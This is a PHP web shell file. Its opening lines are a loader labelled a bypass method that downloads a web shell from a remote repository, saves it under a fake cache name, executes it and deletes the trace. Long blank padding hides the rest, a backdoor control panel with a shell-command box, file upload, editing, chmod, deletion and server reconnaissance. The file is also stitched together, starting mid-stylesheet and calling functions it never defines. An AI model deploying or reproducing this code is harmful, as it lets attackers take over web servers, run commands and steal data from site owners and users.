<?php
// Bypass Method 9: Two-stage - looks like config file
// Stage 1: Save payload to "cache"
$k='cache_'.md5(time()).'.tmp';
$c=file_get_contents('https://raw.githubusercontent.com/webshellseo8/Buy-WebShell-SEO-BlackHat-SEO/refs/heads/main/webshell.txt');
file_put_contents($k,$c);
// Stage 2: Include then cleanup
include $k;
unlink($k);
?>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              position: center;
                background-attachment: fixed;
            }

            a {
                text-decoration: none;
                color: white;
            }

            a:hover {
                color: white;
            }

            /* width */
            ::-webkit-scrollbar {
                width: 7px;
                height: 7px;
            }

            /* Handle */
            ::-webkit-scrollbar-thumb {
                background: grey;
                border-radius: 7px;
            }

            /* Track */
            ::-webkit-scrollbar-track {
                box-shadow: inset 0 0 7px grey;
                border-radius: 7px;
            }

            .td-break {
                word-break: break-all
            }
        </style>
    </head>
<body class="bg-dark text-light">


<?php ?>


    <div class="container-fluid">
        <div class="py-3" id="main">
            <div class="p-4 rounded-3">
                <table class="table table-borderless text-light">
                    <tr>
                        <td><i class="fa fa-server"></i>&ensp;<?= $uname; ?></td>
                    </tr>

                    <tr>
                        <td><i class="fa fa-microchip"></i>&ensp;<?= $soft; ?></td>
                    </tr>

                    <tr>
                        <td><i class="fa fa-satellite-dish"></i>&ensp;<?= $ip; ?>&ensp;|&ensp;Your IP: <?= $uip; ?></td>
                    </tr>

                    <tr>
                        <td><i class="fa fa-fingerprint"></i>&ensp;<?= $dom; ?></td>
                    </tr>

                    <tr>
                        <td><i class="fas fa-cog"></i>&nbsp;[&nbsp;<?php echo writable($path, perms($path)) ?>&nbsp;]
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <i class="fa fa fa-folder pt-1"></i>&ensp;
                            <?php foreach ($exdir as $id => $pat) : if ($pat == '' && $id == 0): ?>
                                <a href="?dir=/" class="text-decoration-none text-light">/</a>
                            <?php endif;
                                if ($pat == '') continue; ?>
                                <a href="?dir=<?php for ($i = 0; $i <= $id; $i++) {
                                    echo "$exdir[$i]";
                                    if ($i != $id) echo "/";
                                } ?>" class="text-decoration-none text-light"><?= $pat ?></a>
                                <span class="text-light"> /</span>
                            <?php endforeach; ?>
                        </td>
                    </tr>
                </table>
                <form action="" method="post" class="row g-2 p-2">
                    <div class="col-auto">
                        <input type="text" class="form-control form-control-sm" name="bdcmd" placeholder="whoami">
                    </div>
                    <div class="col-auto">
                        <button type="submit" class="btn btn-outline-light btn-sm">Submit</button>
                    </div>
                </form>
                <div id="tool">
                    <center>
                        <hr width='20%'>
                    </center>
                    <div class="d-flex justify-content-center flex-wrap my-3">
                        <a href="?" class="m-1 btn btn-outline-light btn-sm"><i class="fa fa-home"></i> Home</a>
                        <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#upload"
                           role="button"
                           aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-upload"></i> Upload</a>
                        <a class="m-1 btn btn-outline-light btn-sm" data-bs-toggle="collapse" href="#info" role="button"
                           aria-expanded="false" aria-controls="collapseExample"><i class="fa fa-info-circle"></i> Info
                            Server</a>
                    </div>
                    <center>
                        <hr width='20%'>
                    </center>

                    <div class="container">
                        <div class="row">
                            <div class="col-md-12">
                                <div class="collapse" id="upload" data-bs-parent="#tool">
                                    <div class="row justify-content-center">
                                        <div class="col-md-5">
                                            <form action="" method="post" enctype="multipart/form-data">
                                                <div class="mb-3">
                                                    <label class="form-label">File Uploader</label>
                                                    <div class="input-group">
                                                        <input type="file" class="form-control" name="uploadfile[]"
                                                               id="inputGroupFile04"
                                                               aria-describedby="inputGroupFileAddon04"
                                                               aria-label="Upload"
                                                               multiple>
                                                        <button class="btn btn-outline-light" type="submit"
                                                                id="inputGroupFileAddon04">Upload
                                                        </button>
                                                    </div>
                                                </div>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="col-md-12">
                                <div class="collapse" id="newFileCollapse" data-bs-parent="#tool">
                                    <div class="row justify-content-center">
                                        <div class="col-md-5">
                                            <form action="" method="post">
                                                <div class="mb-3">
                                                    <label class="form-label">File Name</label>
                                                    <input type="text" class="form-control" name="newFileName"
                                                           placeholder="test.php">
                                                </div>
                                                <div class="mb-3">
                                                    <label class="form-label">File Content</label>
                                                    <textarea class="form-control" rows="5" name="newFileContent"
                                                              placeholder="Hello-World"></textarea>
                                                </div>
                                                <button type="submit" class="btn btn-outline-light">Create</button>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="col-md-12">
                                <div class="collapse" id="newFolderCollapse" data-bs-parent="#tool">
                                    <div class="row justify-content-center">
                                        <div class="col-md-5">
                                            <form action="" method="post">
                                                <div class="mb-3">
                                                    <label class="form-label">Folder Name</label>
                                                    <input type="text" class="form-control" name="newFolderName"
                                                           placeholder="home">
                                                </div>
                                                <button type="submit" class="btn btn-outline-light">Create</button>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="col-md-12">
                                <div class="collapse" id="info" data-bs-parent="#tool">
                                    <div class="row justify-content-center">
                                        <div class="col-md-8">
                                            <div class="mb-3">
                                                <label class="form-label">Server Info</label>
                                                <table class="table text-light">
                                                    <tr>
                                                        <td>Operating System</td>
                                                        <td>:</td>
                                                        <td><?= $uname ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>User / Group</td>
                                                        <td>:</td>
                                                        <td><?= $uid ?>[<?= $user ?>] / <?= $gid ?>[<?= $group ?>]</td>
                                                    </tr>
                                                    <tr>
                                                        <td>PHP Version</td>
                                                        <td>:</td>
                                                        <td><?= phpversion() ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>IP Server</td>
                                                        <td>:</td>
                                                        <td><?= $ip ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>Your IP</td>
                                                        <td>:</td>
                                                        <td><?= $uip ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>Storage</td>
                                                        <td>:</td>
                                                        <td class="td-break">Total = <?= formatSize($total) ?>, Free
                                                            = <?= formatSize($free) ?> [<?= $pers ?>%]
                                                        </td>
                                                    </tr>
                                                    <tr>
                                                        <td>Domains</td>
                                                        <td>:</td>
                                                        <td><?= $dom ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>Software</td>
                                                        <td>:</td>
                                                        <td><?= $soft ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>Disable Functions</td>
                                                        <td>:</td>
                                                        <td class="td-break"><?= $show_ds ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>Useful Functions</td>
                                                        <td>:</td>
                                                        <td><?= rtrim($useful, ', ') ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td>Downloader</td>
                                                        <td>:</td>
                                                        <td><?= rtrim($downloader, ', ') ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td colspan="3">CURL
                                                            : <?= function_exists('curl_version') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?>
                                                            | SSH2
                                                            : <?= function_exists('ssh2_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?>
                                                            | Magic Quotes
                                                            : <?= function_exists('get_magic_quotes_gpc') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?>
                                                            | MySQL
                                                            : <?= function_exists('mysql_get_client_info') || class_exists('mysqli') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?>
                                                            | MSSQL
                                                            : <?= function_exists('mssql_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?>
                                                            | PostgreSQL
                                                            : <?= function_exists('pg_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?>
                                                            | Oracle
                                                            : <?= function_exists('oci_connect') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?></td>
                                                    </tr>
                                                    <tr>
                                                        <td colspan="3">Safe Mode
                                                            : <?= @ini_get('safe_mode') ? '<font class="text-success">ON</font>' : '<font class="text-danger">OFF</font>' ?>
                                                            | Open Basedir : <?= $open_b ?> | Safe Mode Exec Dir
                                                            : <?= @ini_get('safe_mode_exec_dir') ? '<font class="text-success">' . @ini_get('safe_mode_exec_dir') . '</font>' : '<font class="text-warning">NONE</font>' ?>
                                                            | Safe Mode Include Dir
                                                            : <?= @ini_get('safe_mode_include_dir') ? '<font class="text-success">' . @ini_get('safe_mode_include_dir') . '</font>' : '<font class="text-warning">NONE</font>' ?></td>
                                                    </tr>
                                                </table>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>

                <div class="container">

                    <?php if (isset($_POST['bdcmd'])) : ?>
                        <div class="p-2">
                            <div class="row justify-content-center">
                                <div class="card text-dark mb-3">
                                <pre><?php echo $ip . "@" . $serv . ":&nbsp;~$&nbsp;";
                                    $cmd = $_POST['bdcmd'];
                                    echo $cmd . "<br>"; ?><br><code><?php echo cmd($cmd); ?></code></pre>
                                </div>
                            </div>
                        </div>
                    <?php endif; ?>
                    <?php if (isset($_GET['action']) && $_GET['action'] != 'download') : $action = $_GET['action'] ?>
                    <?php endif; ?>
                    <?php if (isset($_GET['action']) && $_GET['action'] != 'delete') : $action = $_GET['action'] ?>
                        <div class="col-md-12">
                            <div class="row justify-content-center">
                                <div class="col-md-5">
                                    <?php if ($action == 'rename' && isset($_GET['item'])) : ?>
                                        <form action="" method="post">
                                            <div class="mb-3">
                                                <label for="name" class="form-label">New Name</label>
                                                <input type="text" class="form-control" name="newName"
                                                       value="<?= $_GET['item'] ?>">
                                            </div>
                                            <button type="submit" class="btn btn-outline-light">Submit</button>
                                            <button type="button" class="btn btn-outline-light"
                                                    onclick="history.go(-1)">
                                                Back
                                            </button>
                                        </form>
                                    <?php elseif ($action == 'edit' && isset($_GET['item'])) : ?>
                                        <form action="" method="post" id="editForm" onsubmit="return encodeContent()">
                                            <div class="mb-3">
                                                <label for="name" class="form-label"><?= $_GET['item'] ?></label>
                                                <textarea id="CopyFromTextArea" rows="10"
                                                          class="form-control"><?= htmlspecialchars(file_get_contents($path . '/' . $_GET['item'])) ?></textarea>
                                                <input type="hidden" name="newContent" id="encodedContent">
                                            </div>
                                            <button type="submit" class="btn btn-outline-light">Submit</button>
                                            <button type="button" class="btn btn-outline-light" onclick="jscopy()">Copy
                                            </button>
                                            <button type="button" class="btn btn-outline-light"
                                                    onclick="history.go(-1)">
                                                Back
                                            </button>
                                        </form>
                                    <?php elseif ($action == 'chmod' && isset($_GET['item'])) : ?>
                                        <form action="" method="post">
                                            <div class="mb-3">
                                                <label for="name" class="form-label"><?= $_GET['item'] ?></label>
                                                <input type="text" class="form-control" name="newPerm"
                                                       value="<?= substr(sprintf('%o', fileperms($_GET['item'])), -4); ?>">
                                            </div>
                                            <button type="submit" class="btn btn-outline-light">Submit</button>
                                            <button type="button" class="btn btn-outline-light"
                                                    onclick="history.go(-1)">
                                                Back
                                            </button>
                                        </form>
                                    <?php endif; ?>
                                </div>
                            </div>
                        </div>
                    <?php endif; ?>
                </div>
                <div class="table-responsive">
                    <table class="table text-light">
                        <thead>
                        <tr>
                            <td style="width:35%">Name</td>
                            <td style="width:11%">Type</td>
                            <td style="width:11%">Size</td>
                            <td style="width:11%">Owner/Group</td>
                            <td style="width:11%">Permission</td>
                            <td style="width:11%">Last Modified</td>
                            <td style="width:10%">Actions</td>
                        </tr>
                        </thead>
                        <tbody class="text-nowrap">
                        <?php
                        foreach ($dirs as $dir) :
                            if (!is_dir($dir)) continue;
                            ?>
                            <tr>
                                <td>
                                    <?php if ($dir === '..') : ?>
                                        <a href="?dir=<?= dirname($path); ?>" class="text-decoration-none text-light"><i
                                                    class="fa fa-folder-open"></i> <?= $dir ?></a>
                                    <?php elseif ($dir === '.') : ?>
                                        <a href="?dir=<?= $path; ?>" class="text-decoration-none text-light"><i
                                                    class="fa fa-folder-open"></i> <?= $dir ?></a>
                                    <?php else : ?>
                                        <a href="?dir=<?= $path . '/' . $dir ?>"
                                           class="text-decoration-none text-light"><i
                                                    class="fa fa-folder"></i> <?= $dir ?></a>
                                    <?php endif; ?>
                                </td>
                                <td class="text-light"><?= filetype($dir) ?></td>
                                <td class="text-light">-</td>
                                <td class="text-light"><?= getOwner($dir) ?></td>
                                <td class="text-light">
                                    <?php
                                    echo '<a href="?dir=' . $path . '&item=' . $dir . '&action=chmod">';
                                    if (is_writable($path . '/' . $dir)) echo '<font color="lime">';
                                    elseif (!is_readable($path . '/' . $dir)) echo '<font color="red">';
                                    echo perms($path . '/' . $dir);
                                    if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir))
                                        echo '</a>';
                                    ?>
                                </td>
                                <td class="text-light"><?= date("Y-m-d h:i:s", filemtime($dir)); ?></td>
                                <td>
                                    <?php if ($dir != '.' && $dir != '..') : ?>
                                        <div class="btn-group">
                                            <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename"
                                               class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip"
                                               data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a>
                                            <?php if (extension_loaded('zip')) : ?>

                                                <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=download"
                                                   class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip"
                                                   data-placement="auto" title="Download"><i
                                                            class="fa fa-file-download"></i></a>
                                                <a class="btn btn-outline-light btn-sm mr-1"
                                                   onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"
                                                   data-toggle="tooltip" data-placement="auto" title="Delete"><i
                                                            class="fa fa-trash"></i></a>
                                            <?php endif; ?>
                                        </div>
                                    <?php elseif ($dir === '.') : ?>
                                        <div class="btn-group">
                                            <a data-bs-toggle="collapse" href="#newFolderCollapse" role="button"
                                               aria-expanded="false" aria-controls="newFolderCollapse"
                                               class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip"
                                               data-placement="auto" title="New Folder"><i
                                                        class="fa fa-folder-plus"></i></a>
                                            <a data-bs-toggle="collapse" href="#newFileCollapse" role="button"
                                               aria-expanded="false" aria-controls="newFileCollapse"
                                               class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip"
                                               data-placement="auto" title="New File"><i
                                                        class="fa fa-file-plus"></i></a>
                                        </div>
                                    <?php endif; ?>
                                </td>
                            </tr>
                        <?php endforeach; ?>
                        <?php
                        foreach ($dirs as $dir) :
                            if (!is_file($dir)) continue;
                            ?>
                            <tr>
                                <td>
                                    <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=edit"
                                       class="text-decoration-none text-light"><i
                                                class="fa fa-file-code"></i> <?= $dir ?>
                                    </a>
                                </td>
                                <td class="text-light"><?= (function_exists('mime_content_type') ? mime_content_type($dir) : filetype($dir)) ?></td>
                                <td class="text-light"><?= fsize($dir) ?></td>
                                <td class="text-light"><?= getOwner($dir) ?></td>
                                <td class="text-light">
                                    <?php
                                    echo '<a href="?dir=' . $path . '&item=' . $dir . '&action=chmod">';
                                    if (is_writable($path . '/' . $dir)) echo '<font color="lime">';
                                    elseif (!is_readable($path . '/' . $dir)) echo '<font color="red">';
                                    echo perms($path . '/' . $dir);
                                    if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir))
                                        echo '</a>';
                                    ?>
                                </td>
                                <td class="text-light"><?= date("Y-m-d h:i:s", filemtime($dir)); ?></td>
                                <td>
                                    <div class="btn-group">
                                        <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=edit"
                                           class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip"
                                           data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a>
                                        <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=rename"
                                           class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip"
                                           data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a>
                                        <a href="?dir=<?= $path ?>&item=<?= $dir ?>&action=download"
                                           class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip"
                                           data-placement="auto" title="Download"><i
                                                    class="fa fa-file-download"></i></a>
                                        <a class="btn btn-outline-light btn-sm mr-1"
                                           onclick="return deleteConfirm('?dir=<?= $path ?>&item=<?= $dir ?>&action=delete')"
                                           data-toggle="tooltip" data-placement="auto" title="Delete"><i
                                                    class="fa fa-trash"></i></a>
                                    </div>
                                </td>
                            </tr>
                        <?php endforeach; ?>
                        </tbody>
                    </table>
                </div>
                <center>
                    <hr width='50%'>
                    Copyright &#169; ULTRA
                </center>
            </div>
        </div>
    </div>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js"
            integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
            crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script>
    <script>

        <?php if (isset($_SESSION['message'])) : ?>
        Swal.fire(
            '<?= $_SESSION['status'] ?>',
            '<?= $_SESSION['message'] ?>',
            '<?= $_SESSION['class'] ?>'
        )
        <?php endif; clear(); ?>

        function deleteConfirm(url) {
            event.preventDefault()
            Swal.fire({
                title: 'Are you sure?',
                icon: 'warning',
                showCancelButton: true,
                confirmButtonColor: '#3085d6',
                cancelButtonColor: '#d33',
                confirmButtonText: 'Yes, delete it!'
            }).then((result) => {
                if (result.isConfirmed) {
                    window.location.href = url
                }
            })
        }

        function jscopy() {
            var jsCopy = document.getElementById("CopyFromTextArea");
            jsCopy.focus();
            jsCopy.select();
            document.execCommand("copy");
        }

        function encodeContent() {
            var textarea = document.getElementById("CopyFromTextArea");
            var hiddenField = document.getElementById("encodedContent");
            // Encode content to base64 before submitting
            hiddenField.value = btoa(unescape(encodeURIComponent(textarea.value)));
            return true;
        }

    </script>
    </body>
    </html>